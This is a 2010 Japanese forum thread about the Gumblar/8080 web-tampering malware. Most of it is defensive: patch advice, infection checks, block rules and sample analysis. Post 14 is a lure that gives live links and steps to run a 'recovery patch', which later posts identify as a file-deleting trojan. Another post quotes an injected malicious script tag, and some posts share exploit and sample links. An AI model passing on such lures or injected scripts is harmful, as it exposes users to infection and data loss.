【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2010/01/10(日) 01:37:53ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0002名無しさん@お腹いっぱい。
2010/01/10(日) 01:38:27下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0003名無しさん@お腹いっぱい。
2010/01/10(日) 01:39:040004名無しさん@お腹いっぱい。
2010/01/10(日) 01:39:19■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
0005名無しさん@お腹いっぱい。
2010/01/10(日) 01:40:00■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
0006名無しさん@お腹いっぱい。
2010/01/10(日) 01:40:43メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
0007名無しさん@お腹いっぱい。
2010/01/10(日) 01:41:37抜け、間違いがあれば指摘よろ
0008名無しさん@お腹いっぱい。
2010/01/10(日) 01:49:130009名無しさん@お腹いっぱい。
2010/01/10(日) 01:54:41行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0010名無しさん@お腹いっぱい。
2010/01/10(日) 01:59:51【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
0011名無しさん@お腹いっぱい。
2010/01/10(日) 02:00:50→豪快にavast!とClamAVをスルーしたぞこいつ・・・
→Anti VM・・・だと!?
解析する前にunpack+Anti Anti Debugする必要が・・・
もう少し時間がかかる。
0012名無しさん@お腹いっぱい。
2010/01/10(日) 02:03:43msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
0013名無しさん@お腹いっぱい。
2010/01/10(日) 02:04:06デバッガを通す"だけ"でAnti VMを回避できた件・・・何このウイルスどうなってるの・・・
0014名無しさん@お腹いっぱい。
2010/01/10(日) 02:04:45http://sirmaximus.com/?security/news/view.cgi?type=gumblar
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
0015名無しさん@お腹いっぱい。
2010/01/10(日) 02:05:20旦 旦 旦 旦 旦
旦 旦 旦 旦 旦
旦 旦 旦 旦 旦
旦 旦 旦 旦 旦
旦 旦 旦 旦 旦
旦 旦 旦 旦 旦
. ∧__,,∧ 旦 旦 旦 旦 旦
( ´・ω・ ). 旦 旦 旦 旦 旦
. /ヽ○==○ 旦 旦 旦 旦 旦
/ ||_ |_ 旦 旦 旦 旦 旦
し' ̄(_))  ̄(_))  ̄(_))  ̄(_))
>>1乙
これはただのお茶なんだから。レスポップアップして見ないでね。
0016名無しさん@お腹いっぱい。
2010/01/10(日) 02:07:13ウイルス注意
0017名無しさん@お腹いっぱい。
2010/01/10(日) 02:09:40特に怪しげな動きを見せない(本体をコピーしようとするが失敗に終わっている)
0018名無しさん@お腹いっぱい。
2010/01/10(日) 02:20:09genoや8080じゃないけどウイルス警告
Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
tp://sirmaximus●com/?security/news/
view●cgi?type=gumblar
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Clicker.JS.Iframe.cz
情報:
2:14:52
Kaspersky Internet Security 2010
URL:
tp://www14●atpages●jp/saba02site/files/
fukkyuu0●zip
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan.BAT.KillFiles.mb
情報:
2:15:33
Kaspersky Internet Security 2010
0019名無しさん@お腹いっぱい。
2010/01/10(日) 02:24:45ファイルを削除されるお・・・
0020名無しさん@お腹いっぱい。
2010/01/10(日) 02:26:00ファイル削除ウイルスってモペキチだろww
ttp://www28.atwiki.jp/mopekiti/pages/142.html
0021名無しさん@お腹いっぱい。
2010/01/10(日) 02:33:26Pass:virus
jad乙
0022名無しさん@お腹いっぱい。
2010/01/10(日) 02:48:03http://www●mag-x●com/にアクセスするとメンテナンスページに飛ばされるけど
リダイレクトが2回あって1回目でG dataが反応する
997 :名無しさん@お腹いっぱい。:2010/01/10(日) 02:37:38
>>993
ほんとだ
http://www●mag-x●com/ ←302だけどボディに/*LGPL*/
↓
http://www●mag-x●com/pc●html
↓
http://www●mag-x●com/blog/index●html
センセイはスルー中
ttp://www.google.com/safebrowsing/diagnostic?site=www.mag-x.com&hl=ja
0023名無しさん@お腹いっぱい。
2010/01/10(日) 02:49:54320 : 錐(関東・甲信越):2010/01/09(土) 13:26:32.65 ID:B+8hBSVN
・avast!用
webシールド→URLブロック
*:8080/*
・Adblock Plus用
|http://*:8080*
注:|http://*8080/*だと機能しない(後ろ側の / ←に注意)
上記は「http://〜〜:8080/〜」
というURLを使ってくる限りずっと有効。
0024名無しさん@お腹いっぱい。
2010/01/10(日) 02:50:41http://www.aguse.jp/ なら見事だお
0025名無しさん@お腹いっぱい。
2010/01/10(日) 02:52:55Gumblar(GENO)に感染させる悪質コードを検出するプログラム書いた
寝たい・・
0026名無しさん@お腹いっぱい。
2010/01/10(日) 02:53:56乙
avast!に提出しておいた
0027名無しさん@お腹いっぱい。
2010/01/10(日) 02:54:35これって、ほんとにテスト用のウイルス?
0028名無しさん@お腹いっぱい。
2010/01/10(日) 02:56:10>>22は検出できたGJ
0029名無しさん@お腹いっぱい。
2010/01/10(日) 02:57:24stringsコマンドでざっくりみたらJavaScriptは埋め込まれてるね。
どういう動作するんかは試してないけども。
0030名無しさん@お腹いっぱい。
2010/01/10(日) 03:02:18XSS対策できてないみたいです
0031名無しさん@お腹いっぱい。
2010/01/10(日) 03:03:35乙
Operaでも動く模様
avast!には怒られたがw
003225
2010/01/10(日) 03:07:21ありがとうございます。見つけたところを直しておきました
PHPソースを見る機能をつけたのでおかしなところがあれば何でも言ってやってください
0033名無しさん@お腹いっぱい。
2010/01/10(日) 03:08:00アバストに引っかかるんだけど。
0034名無しさん@お腹いっぱい。
2010/01/10(日) 03:09:01ウイルスコードそのまま表示してるからじゃね?
0037名無しさん@お腹いっぱい。
2010/01/10(日) 03:23:23乙!avastに怒られなくなったわ
0038人種差別問題
2010/01/10(日) 03:32:39ttp://www.youtube.com/watch?v=7q3wQ0Ux8TI
これの1:18にボーガンの矢が打ち込まれてるぞ
これは殺人未遂事件だ。
いいですか、
ボーガンというのは狩猟道具なんです。
狩猟と言うのは動物を対象としているわけです。
放水はあくまで人間相手だから放水なんです。
しかし、ボーガンと言うのは人間相手の攻撃ではなくて、
「動物」相手の攻撃なんだ。
要するに日本人を動物とみなしているからこそ、
ボーガンで「狩り」をしてくるわけだ。
これは捕鯨問題ではなくて、
人種差別問題なんだ。
だから日本人は怒らなければいけないんだ。
日本人は差別されている!!
0039名無しさん@お腹いっぱい。
2010/01/10(日) 04:00:42それでも漏れるでしょ
0040名無しさん@お腹いっぱい。
2010/01/10(日) 04:08:27でおk
0041名無しさん@お腹いっぱい。
2010/01/10(日) 04:12:31プログラムの終了中です。 n
というメッセージが出るようになりました。
n というのはプログラム名だと思うんですけど、特に心当たりはありません
avastを使っていて、正直該当サイト踏んだ記憶あるので
これってもしかして感染していますか?
一応完全スキャンと、オンライン検査はしています。
0042名無しさん@お腹いっぱい。
2010/01/10(日) 04:17:10CVE-2009-4324かと思ったらCVE-2009-0927だけかよ
これか ttp://www.corruptcode.org/library/src/spltsrc/2009-CVE-2009-0927_package/CVE-2009-0927_package%5Cevil_pdf.py
payloadは本当にMessageBox出すだけみたいだな
しかしpayloadのDLLでかすぎだろ
こんなのもっと小さく作れよ
0043名無しさん@お腹いっぱい。
2010/01/10(日) 04:24:34どうやって解析したの?
0044名無しさん@お腹いっぱい。
2010/01/10(日) 04:52:38dll_payload = unescape("%u5a4d%u0090
ここのunescapeに渡されてる文字列がpayload(DLL)だから
これを取り出してバイナリにすれば古いAdobe Reader用意してなくても解析できる
shellcodeは>>42のURLのやつと同じだからpayloadだけmalwareじゃないと分かればいい
解析は仮想マシンで実行したり逆アセして読んだり
0045名無しさん@お腹いっぱい。
2010/01/10(日) 05:12:09thxです。
こういうこと仕事でやってる方ですか?
0046名無しさん@お腹いっぱい。
2010/01/10(日) 05:12:298080系だと仮定してレスするが
>>21 のうpしてくれた今のウイルス本体は
結果: 3/41 (F-Secure,Panda,Prevx)
ttp://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263065521
だから検出しないんだろう
とりあえず >>6 の感染確認で見てみればどうだ?
0047名無しさん@お腹いっぱい。
2010/01/10(日) 05:29:36ただのニートだよ
仕事でやってる方ほどの知識はないよ
>>21のうpしてくれたウイルス本体をanubisに投げてみた
ttp://anubis.iseclab.org/?action=result&task_id=1f6c515039f6cb6a45d78e22d06cf05ce&format=html
>>6の感染確認方法はまだ使えるな
0048名無しさん@お腹いっぱい。
2010/01/10(日) 05:43:43セキュリティ企業で働きなさい。もったいない。
0049名無しさん@お腹いっぱい。
2010/01/10(日) 05:57:532009-11-11 18:52:09
サイトのタイトル
なし
実際に表示されるサイトのURL
ttp://www14●atpages.jp/saba0●site/files/fukkyuu0.zip
IPアドレス
203.152.213.250
逆引きホスト名
203.152.213.250.static.zoot.jp
画像取得日時
2010-01-10 05:39:48
検出されたウイルス(ワーム、スパイウエア)
★Trojan.BAT.KillFiles.mb
サーチ
1 60.42.255.33
2 118.21.192.131
3 118.21.197.41
4 218.43.251.37
5 210.190.162.5
6 118.23.168.15
7 122.1.246.94
8 221.184.27.254
9 163.139.130.150
10 163.139.124.135
11 203.152.213.250
www14.atpages.jp
0050名無しさん@お腹いっぱい。
2010/01/10(日) 05:59:31ttp://pc11.2ch.net/test/read.cgi/sec/1263055073/
2010/01/10 02:04:45 書き込み時間
>>14 は軽犯罪法に抵触され
実害も発生したため警察へ通報を検討中
謝罪投稿で良心的態度を示してください
0051名無しさん@お腹いっぱい。
2010/01/10(日) 06:01:08Anubisのレポートのおかげで >>6 のミスに気付いた
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
0052名無しさん@お腹いっぱい。
2010/01/10(日) 06:04:49"%u5a4d%u0090
MZヘッダーなのは判るけど、これ一発でバイナリ化するツールとかあるん?
0053名無しさん@お腹いっぱい。
2010/01/10(日) 06:16:49●セキュリティ板専用アプロダ推奨↓
http://tane.sakuratan.com/
・ダウンロードパスワード、解凍パスワードは、できれば、"infected"か "virus"推奨
圧縮はzipがのぞましい
0054名無しさん@お腹いっぱい。
2010/01/10(日) 06:18:10>>6 >>12 の「感染確認」は一部正確ではありません
そのまま実行してもスタートアップのsiszyd32.exeが残ったままなので
起動時に再感染すると思われます
ご注意ください
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
*******************************************
やっぱり検証しないとダメだなorz
0055名無しさん@お腹いっぱい。
2010/01/10(日) 06:24:12http://aomori.cool.ne.jp/hime5/miku666.jpg
0056名無しさん@お腹いっぱい。
2010/01/10(日) 06:27:59グロ注意
0057名無しさん@お腹いっぱい。
2010/01/10(日) 06:36:19http://www.110kz.com/003/
0058名無しさん@お腹いっぱい。
2010/01/10(日) 06:43:58全て破壊されたよ、過去に戻りたい… シニタイ
0059名無しさん@お腹いっぱい。
2010/01/10(日) 06:48:20騒がれるだいぶ前からたまに出る。ネトゲやってない?
X虎とかそういう系かなぁと思ってたんだが
0060名無しさん@お腹いっぱい。
2010/01/10(日) 06:57:14http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q119038941
0061名無しさん@お腹いっぱい。
2010/01/10(日) 07:02:14踏んだら死ぬよ、最後フォーマット完遂
0062名無しさん@お腹いっぱい。
2010/01/10(日) 07:49:17現在の状態: 完了
結果: 4/41 (9.76%)
F-Secure Suspicious:W32/Riskware!Online
Kaspersky Backdoor.Win32.Bredolab.bsr
Panda Suspicious file
Prevx Medium Risk Malware
追加情報
File size: 23040 bytes
MD5 : 35d23f69b7af292c2dcea9a1b58b6ef3
http://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263069197
Name of malicious program Detection time Update released
10 January 2010
Backdoor.Win32.Bredolab.bsr 00:24 10 Jan 2010, 04:37 (JST)
http://www.kaspersky.com/viruswatchlite?search_virus=Backdoor.Win32.Bredolab.bsr&hour_offset=6
* ワ━━━━━ + *
+ パチパチ パチパチ パチパチ *
* ゛ ∧_∧ ゛∧_∧ ∧_∧〃 +
+ ヾ( )ノ ヾ( )/ヾ\( )/″
/ / .| |. \ \
ノ ̄ゝ ノ ̄.\ / ̄.\
0063名無しさん@お腹いっぱい。
2010/01/10(日) 08:01:44>>21に、うpられる前あたりとか、あーでもない、こーでもない、含めて ザ・現実。やな
0064名無しさん@お腹いっぱい。
2010/01/10(日) 08:04:01こどもか
0065名無しさん@お腹いっぱい。
2010/01/10(日) 08:06:050066名無しさん@お腹いっぱい。
2010/01/10(日) 08:10:350067名無しさん@お腹いっぱい。
2010/01/10(日) 08:13:05ν速にもあったよそれ
0068名無しさん@お腹いっぱい。
2010/01/10(日) 08:39:070069名無しさん@お腹いっぱい。
2010/01/10(日) 08:47:000070名無しさん@お腹いっぱい。
2010/01/10(日) 09:32:30ttp://www.virustotal.com/jp/analisis/189416f54f929ebaeb6ae7116c5833e822b09b0bc1d4dab82e2bcc030a1450f1-1263083398
0071名無しさん@お腹いっぱい。
2010/01/10(日) 11:45:13そのPDFファイルうp
0072名無しさん@お腹いっぱい。
2010/01/10(日) 11:56:29アイコンが以前と違うな
ttp://www.virustotal.com/jp/analisis/ea9714abd8c3107877e397a39be3d5751a5f7a3dc74b7cb7413639fd40725a94-1263092043
0073名無しさん@お腹いっぱい。
2010/01/10(日) 12:04:43>>52 Perl使った
open my $fr, 'up36170.pdf' or die;
binmode $fr;
my $pdf = do {local $/; <$fr>};
close $fr;
my $n = 0;
while ($pdf =~ s/unescape\("([^"]+)//) {
$_ = $1;
s/%u([0-9A-Fa-f]{4})/pack("v", hex($1))/eg; # unescape
open my $fw, '>', $n++ or die;
binmode $fw;
print $fw $_;
close $fw;
}
>>71 >>27
0074名無しさん@お腹いっぱい。
2010/01/10(日) 12:15:57www●candyfruit●com/brand_policy/
0075名無しさん@お腹いっぱい。
2010/01/10(日) 12:24:48あららららw
0076名無しさん@お腹いっぱい。
2010/01/10(日) 12:26:37●セキュリティ板専用アプロダ推奨↓
http://tane.sakuratan.com/
・ダウンロードパスワード、解凍パスワードは、できれば、"infected"か "virus"推奨
upしてー
0077sage ◆sage/xLnlI
2010/01/10(日) 12:40:35http://www16.atpages.jp/filedl/dnserror.html
コード入り注意
0078名無しさん@お腹いっぱい。
2010/01/10(日) 13:05:00昔オカ板のどっかの倉庫だったのがなんか宣伝サイトになってるけどここも。
こんなサイトは報告することもないか
0079名無しさん@お腹いっぱい。
2010/01/10(日) 13:10:170080名無しさん@お腹いっぱい。
2010/01/10(日) 13:14:360081名無しさん@お腹いっぱい。
2010/01/10(日) 13:30:10最新バージョン1.1では/*LGPL*/に対応しているみたいだ
ttp://justcoded.com/article/gumblar-family-virus-removal-tool/
0082名無しさん@お腹いっぱい。
2010/01/10(日) 13:34:44お目にかかったことはないけど、Flashとかを埋め込んだ文書の作成や閲覧ができるらしいよ。
0083名無しさん@お腹いっぱい。
2010/01/10(日) 13:45:20ttp://www.dotup.org/uploda/www.dotup.org546892.7z
PASS:virus
0084名無しさん@お腹いっぱい。
2010/01/10(日) 13:48:08ソフトウェア制限のポリシーで実行可能パスをデフォルトの最小限枠に絞っていても感染しますか?
と訊かれたのですが何の事ですか?
0085名無しさん@お腹いっぱい。
2010/01/10(日) 13:51:260086名無しさん@お腹いっぱい。
2010/01/10(日) 14:05:21もう亜種が出るのか・・・
avast!に提出しておいた
008786
2010/01/10(日) 14:40:07次から自分は控えとくか
0088名無しさん@お腹いっぱい。
2010/01/10(日) 14:45:14検体を沢山送って早く対応してくれれば。
0089名無しさん@お腹いっぱい。
2010/01/10(日) 14:52:52いや、向こうのスレのテンプレで
多重送付を避けるとなっているからな
実際ベンダーの迷惑になりかねないだろ
0090名無しさん@お腹いっぱい。
2010/01/10(日) 14:58:010091名無しさん@お腹いっぱい。
2010/01/10(日) 15:01:00被ってすまぬ〜。
俺、平日は 2ch 監視してる時間無いから引っ込むわ。
あとよろ。
0092名無しさん@お腹いっぱい。
2010/01/10(日) 15:03:07被っても問題ないだろ
数をこなさないと対応してくれないだろ
0093名無しさん@お腹いっぱい。
2010/01/10(日) 15:05:35向こうに報告しないで勝手にやってた自分が悪い
提出したら向こうに報告するよ
0094名無しさん@お腹いっぱい。
2010/01/10(日) 15:12:371つの検体を多数送っても無意味だろ
多数の検体を送るならまだしも
0095名無しさん@お腹いっぱい。
2010/01/10(日) 15:33:55ttp://*.thechocolateweb.ru*
ttp://*.guidebat.ru*
ttp://*.suesite.ru*
ttp://*.superaguide.ru*
ttp://*.theatticsale.ru*
ttp://*.themobilewindow.ru*
ttp://*.lagworld.ru*
ttp://*.worldsouth.ru*
ttp://*.ampsguide.ru*
ttp://*.webnetloans.ru*
ttp://*.webnetenglish.ru*
ttp://*.theaworld.ru*
ttp://*.thelaceweb.ru*
まだまだありそう
0096名無しさん@お腹いっぱい。
2010/01/10(日) 15:35:42.ru:8080/か.ru/を丸ごとブロックで十分じゃね
0097名無しさん@お腹いっぱい。
2010/01/10(日) 15:36:040098名無しさん@お腹いっぱい。
2010/01/10(日) 15:38:070099名無しさん@お腹いっぱい。
2010/01/10(日) 15:39:21botnetの構築
0100名無しさん@お腹いっぱい。
2010/01/10(日) 16:10:04なるほどー
深いな
0101名無しさん@お腹いっぱい。
2010/01/10(日) 16:14:45暇だから目についたURL片っ端から踏んでるけど
0102名無しさん@お腹いっぱい。
2010/01/10(日) 16:39:520103名無しさん@お腹いっぱい。
2010/01/10(日) 16:50:150104名無しさん@お腹いっぱい。
2010/01/10(日) 16:53:10何のREADME?
0105名無しさん@お腹いっぱい。
2010/01/10(日) 17:02:080106名無しさん@お腹いっぱい。
2010/01/10(日) 17:10:42irc@2chでもbot作ろうとした人が鯖管に警告受けてたなあ・・・。
0107名無しさん@お腹いっぱい。
2010/01/10(日) 17:11:37間違えた・・・。
0108名無しさん@お腹いっぱい。
2010/01/10(日) 17:14:35irc@2chをBotnetの拠点にしたのかww
0109名無しさん@お腹いっぱい。
2010/01/10(日) 17:17:50何の鯖管?
0110名無しさん@お腹いっぱい。
2010/01/10(日) 17:24:31http://www.goodroom.co.jp/
0111名無しさん@お腹いっぱい。
2010/01/10(日) 17:36:10感染してない
0112名無しさん@お腹いっぱい。
2010/01/10(日) 17:39:130113名無しさん@お腹いっぱい。
2010/01/10(日) 17:39:420114名無しさん@お腹いっぱい。
2010/01/10(日) 17:41:06ttp://alabaule・com/
0115名無しさん@お腹いっぱい。
2010/01/10(日) 17:48:27/*LGPL*/
0116名無しさん@お腹いっぱい。
2010/01/10(日) 17:49:40http://www.virustotal.com/jp/analisis/004931db79093c9f72976b92a86d2ff564374138e000a542dff070ddeae82a1b-1263113207
結果: 7/41 (17.08%)
リンク先はgoogleセーフブラウジングで攻撃サイト判定
0117名無しさん@お腹いっぱい。
2010/01/10(日) 18:16:27古いWinXPを再インスコするとFlashの6が入っています。(WinXPSP1→SP3にした)
AdobeReaderなしのとき、これでもやられちゃいますか?
0118名無しさん@お腹いっぱい。
2010/01/10(日) 18:28:08どちらかが欠けていれば何もならない
0119名無しさん@お腹いっぱい。
2010/01/10(日) 18:28:42危険なところ行く前に、アドビに行って最新版入れればいいだけでしょ。
0120名無しさん@お腹いっぱい。
2010/01/10(日) 18:30:370121名無しさん@お腹いっぱい。
2010/01/10(日) 18:35:53安全なPCからあらかじめ最新のインストーラをDLして
メディアに焼けばおkじゃね
0122名無しさん@お腹いっぱい。
2010/01/10(日) 18:37:16残念ながら片方だけで感染する
今回狙われている脆弱性を持つプログラム
・Adobe Reader(未修正)
・Sun Java(脆弱性、いいえ仕様です)
・Microsoft InternetExplorer(最新版は影響無し)
0123名無しさん@お腹いっぱい。
2010/01/10(日) 18:37:37tp://www●derinkuyumuftulugu.gov●tr/haber/yazimaraclari/RTE_popup_open_file●asp
<script src=http://kasino●hdd1●ru/index●php></script>
URLをエn(ry
0124名無しさん@お腹いっぱい。
2010/01/10(日) 18:37:390125117
2010/01/10(日) 18:38:46「Adobeもflashいれてないからいいや」って思ってたら、WinXPに入っていたこと思い出して・・
0126名無しさん@お腹いっぱい。
2010/01/10(日) 18:40:34それはちょっと別のタイプだな
0127名無しさん@お腹いっぱい。
2010/01/10(日) 18:44:34kwsk
0128名無しさん@お腹いっぱい。
2010/01/10(日) 18:45:57表示サイト
http://ala*aule*com*
IPアドレス
82.165.98.36
逆引きホスト
kundenserver.de
検出体
Trojan-Downloader.JS.Agent.ewo
alabaule.com サーバの位置
国名 地域名 都市名
GERMANY Karlsruhe Karlsruhe
0129名無しさん@お腹いっぱい。
2010/01/10(日) 18:47:210130名無しさん@お腹いっぱい。
2010/01/10(日) 18:48:44渡す前にできないの?
0131名無しさん@お腹いっぱい。
2010/01/10(日) 18:49:48あるよ
>>127
セットで動いてるわけじゃないからね
0132117
2010/01/10(日) 18:49:58>Adobeもflash
どっちもadobeだよねorz
正しくは「Adobe RedaerもAdobe Flash」
だな
0133名無しさん@お腹いっぱい。
2010/01/10(日) 18:51:29駄目なのか
javaもreaderも入れてないからセーフかななんて期待してしまった
更新するたびに毎回コードが変わるね
0135117
2010/01/10(日) 18:53:13あさってくらいリリースのやつ入れて渡したとしても次のヤツを入れられない。
いっそ削除できればいいな。
Webサイト見せたくないけど見るのに使われてもらっちまうよりはいい。
「このパソで見るもんじゃない。だから絵は動かないんだ」で通る。
0136名無しさん@お腹いっぱい。
2010/01/10(日) 18:53:590137名無しさん@お腹いっぱい。
2010/01/10(日) 18:54:23FoxitにもJavaScriptが搭載されてる件
0138名無しさん@お腹いっぱい。
2010/01/10(日) 18:56:36それは知ってるけど、脆弱性は無いのかな?ってことなんだけど。
0139117
2010/01/10(日) 19:01:38のあさってリリースってReaderだけですね。
